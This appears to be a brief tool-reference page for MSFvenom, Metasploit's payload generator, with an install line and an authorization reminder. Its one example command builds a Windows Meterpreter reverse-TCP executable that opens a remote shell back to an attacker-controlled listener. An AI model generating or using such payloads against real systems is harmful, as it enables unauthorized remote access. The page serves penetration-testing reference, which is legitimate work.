hackingDNA

MSFvenom

Exploitationkali · parrot

Payload generator and encoder from the Metasploit project.

Install

sudo apt install metasploit-framework

Common commands

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe > shell.exe

Use only on systems you are authorized to test. Follow program scope.

Related tools